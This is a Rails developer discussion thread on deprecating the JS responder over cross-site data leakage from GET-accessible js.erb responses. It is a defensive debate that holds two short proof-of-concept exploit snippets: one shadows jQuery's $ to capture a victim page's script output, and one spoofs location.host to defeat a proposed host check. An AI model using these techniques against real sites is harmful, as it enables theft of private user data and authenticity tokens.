Remove :js responder

https://github.com/rails/rails/issues/12374#issuecomment-29446761

Here in discussion I proposed to deprecate JS responder because this technique is insecure and not pragmatic way to transfer data.

It can be exploited in this way http://homakov.blogspot.com/2013/05/do-not-use-rjs-like-techniques.html

i find this bug very often so i know what i’m talking about. With it attacker can steal user data and authenticity_token if templates with form were leaked too.

Removing it seems fine to me, but I suppose we should deprecate it
first. Don't people need to specifically say "render js: whatever"?

I think 100% of "render js:" cases can be implemented using JSON. But
maybe I am wrong.

A lot of people use the js responder with ujs, but there are often bugs with how jQuery handles the automatic code execution of js ajax responses, so I agree, it’s something I wouldn’t mind deprecating.

One reason people tend to use js responders is to use js.erb to embed values from ruby into the returned js, but I think a better way to do this is to use json and HTML data attributes to embed values when necessary.

I am not against removing this (I personally don’t have use for this anymore), but the reason behind the removal this seems unclear to me.

If it’s just “let’s remove this because no one uses this anymore” (and if that’s true), or “Rails want to discourage this type of architecture in favour of moving these type of processing to the client”, then fine. But I am not sure if I fully understand the security angle here.

Specifically, in Egor’s blog post:

  1. "Broken concept & architecture. This feels as weird as the client-side sending code that is going to be evaled on the server-side… wait… Rails programmers had similar thing for a while :/"

But in the context of a web application, by definition you are always sending JavaScript code from your server to be eval()-ed in the client (browser) :slight_smile: Whether the code is in /assets/javascript or in your controller, there’s really no difference here.

So I’ll have to assume you are talking about eval()-ing code that contains user-supplied data that’s bad. Which is fair enough, considering there’s usually a safer way to do this (encoding the user-supplied data as JSON first).

But as Andrew pointed out on the Github issue, there might be legitimate use cases for using this to return code that does NOT contain user-supplied data. I think those use cases needs to be understood properly (and we need to investigate/suggest alternatives for those cases) to ensure we are not removing a useful feature just because it’s subject to abuse.

  1. **"**Escaping user content and putting it into Javascript can be more painful and having more pitfalls then normal HTML escaping. … There can be more special characters and XSS you should care about."

Is this not already adequately addressed by the escaping helpers Rails provide? If so, regardless of whether we remove the js responder, those issues should be reported and fixed in Rails itself. I just opened https://github.com/rails/rails/pull/13073 yesterday to patch json_escape to make it useful again (please provide feedback), and I plan to submit another PR to improve the docs on escape_javascript to make the intended use cases more clear.

If it is already possible to correctly escape input for use in the JS responder, just that it’s difficult to do it correctly, the problem might not lie in the JS responder pre-se and we should take this opportunity to address them.

  1. "JSONP-like data leaking. If app accepts GET request and responds with Javascript containing private data in it attacker can use fake JS functions to leak data from the response."

I assume you are talking about CSRF attacks where a page on a third-party domain can make requests to your site on your user’s behalf. But like you said, this problem also exists in JSONP. In fact, it’s probably much easier to exploit this in JSONP (because you can control the name of the callback) than a JS response that updates a certain part of the page. So I’m not sure if this is really JS responder’s fault. And like Andrew said, in his use case there’s nothing to leak.

Maybe I am not understanding this point correctly. If you can provide some examples based on the apps you see in the field it will be very helpful.

  1. "UPD as pointed out on HN evaling response will mess with your global namespace and there is no way to jump into closure you created request in…"

(I suppose this is not related to security.)

If you are doing a lot you should definitely architect your client-side JavaScript properly, that I agree 100% (I mainly write full-blown single page apps these day for my day job, so believe me when I say we are in agreement :). But in cases where you are delivering a small, simple payload to update a small part of the page, I don’t know if that’s super evil and should be strongly discouraged.

I don’t do this, so I’m not really in a good position to defend it. Again, maybe it’s just a case of “no one uses this anymore so it’s not worth supporting”, and that’s fine by me. But you brought up security, so I want to make sure we address your concerns properly.

Godfrey

I believe the primary use case for js responder is remote forms, where you are not doing the request yourself, so a js response is the simplest and most natural approach there. This is not inherently insecure so should not be deprecated just because it does not feel good to some.

A lot of the proposed issues aren’t really too bad IMO, they’re mainly just related to one developer’s preferences and taste over another. I personally don’t think returning JS from an ajax call is much (if any) worse than returning HTML. It’s all just your server rendering some markup/code for the browser to interpret.

However, from the UJS side, the main issue with using JS as the response, is that the user has no control over the exact context of the automatic eval being done by jQuery, or exactly when during the callback sequence the code is eval’d. This actually caused code to break at one point due to a jQuery update, which would cause issues if your returned JS replaced the element that triggered the UJS remote (ajax) call. See:

https://github.com/rails/jquery-ujs/issues/223#issuecomment-2791098

That being said, I’m not necessarily in the “we should deprecate this” camp. I’m somewhat indifferent. Deprecation means one less thing to maintain (and would allow me to delete all of one line in UJS).

– Steve Schwartz

About the HTML rendering use case, I would point out that it could be adequately solved using render_to_string, and IMHO more elegantly, since the related JS could be included in the assets, and so organized toghether with the other JS source.

I can’t think about use cases where RJS is preferable over render :json, does anyone do?

I am -1 for deprecating the js responders

Personally I find using the js.erb templates much easier, more DRY and more expressive then returning a HTML string as a JSON element. Any JavaScript in the js.erb should be specific to initializing the rendered HTML and would exist in the event handler of the AJAX call anyways, so having it in the assets seems of little benefit. All the reusable code should live in the assets either way.

It does not seem like removing it provides any benefit to the people who would prefer to use all JSON. So, other than forcing a preference on the community, why deprecate it?

Focus on security concern. I repeat - any GET accessible .js.erb IS a vulnerability because leaks all data it has inside.
All “i use it because it’s fast/convenient” means nothing if it’s a vulnerable technique. IMO

Normally can be exploited this way:

function $(){ return {html: function(){ console.log('LEAKED',arguments);}}};

document.write('<script src="http://SITE/objects.js"></script>')

Not only are js.erb templates not deprecated, they are a great way to develop an application with Ajax responses where you can reuse your server-side templates. It’s fine to explore ways to make this more secure by default, but the fundamental development style of returning JS as a response is both architecturally sound and an integral part of Rails. So that’s not going anywhere.

So let’s instead explore ways of having better escaping tools, warnings, or defaults that’ll work with the wonders of RJS.

@dhh as i mentioned above for GET request this will always be a security breach. So leaving it for POST only? Doesn’t make sense.
Also https://twitter.com/homakov/status/406426491937759232

Right, I agree that if used incorrectly this be a vector for CSRF attacks. But like you said, this is also a problem for JSONP, which is by far way more popular. So unless we also remove JSONP there problem you are complaining is still there, no?

Maybe we should improve the documentation to point out that you should not be using cookies to authenticate “private” JSONP/JS endpoints? Perhaps we can make it easier to do token-based authentication for API requests?

Because personally I don’t see JSONP going away.

Godfrey

GET requests using Cookies for authentication. That returns non-public data.

It’s not very proper comparison. Nobody uses JSOPN w/o a reason. Autocomplete, as maximum. And security concern of jSONP is way more known than RJS bug (did you see articles on this topic but mine?)

Maybe we should improve the documentation to point out that you should not be using cookies to authenticate “private” JSONP/JS endpoints

IMO, it should be fixed somewhere in code, not in documentation. People don’t read it periodically.

Not using cookies for JS responses breaks the idea of templating. For API people should use JSON§. Why JS?

GET requests using Cookies for authentication. That returns non-public data.
most of the time this is the case. JS templates return whole forms with authenticity_token in it!

Thanks for the explanation. I now better understand the point you made in your original argument and the security concern you raised.

GET requests using Cookies for authentication. That returns non-public data.

most of the time this is the case. JS templates return whole forms with authenticity_token in it!

My point here is not that “JS endpoints that uses cookie + return private data” isn’t a common misuse, that I’m sure you are more qualified to give an opinion than I do, based on the apps you work on. My point is I don’t think that this is inherently flawed and fundamentally impossible to fix (and hence we must remove it). Not using cookies for auth is one possible way to fix, but as you pointed out…

Not using cookies for JS responses breaks the idea of templating. For API people should use JSON§. Why JS?

And I think you are quite right. Having to deal with alternative authentication scheme that does not rely (only) on cookies, on both the client and the server side, probably cancels out a lot of the benefits of using JS responses (simplicity etc).

However, I think there are probably something else that Rails can do to fix the security concerns you have. For example, we can automatically wrap all JS responses with something like…

if(<%= an_array_of_whitelisted_hosts %>.indexOf(window.location.host) > 0){
// … the actual response goes here …

}

What do you think about this? It seems like this would be quite easy for Rails to implement. We can turn this on by default with the list defaults to request.host and provide a way to opt out. Would that address your concerns?

Again, I personally don’t use this feature, so I don’t have a strong opinion on whether it should be kept in core. I’m just focusing on the security concerns you raised and see what we can do to make Rails better. And I suspect there are ways to make this feature more secure by default without removing it.

Godfrey

location.defineGetter(‘host’,function(){return ‘google.com’})

undefined

location.host

google.com

Since POSTs already require a csrf token, the rjs calls should do the same
thing. Make them require the auth token in the url, or even better, have
rails generate a hash of the auth token and the url and compare on the
server. Thus you can't call any rjs without using rails helpers to generate
the correct url and matching token, and the new token would not be leaking
the original csrf token via url or referer. It's effectively using methods
similar to how we build APIs with hmac signing of the request, but in a
lightweight form and only in the background for RJS (or whatever else you
want to protect, I suppose). This seems a little out of the scope of the
core rails project, though?

Homakov,

What Godfrey suggest may be implemented on the server side instead of client side without being hacked so easily?

We may raise an exception by default when the host is not allowed, assuming that request.host is trustable.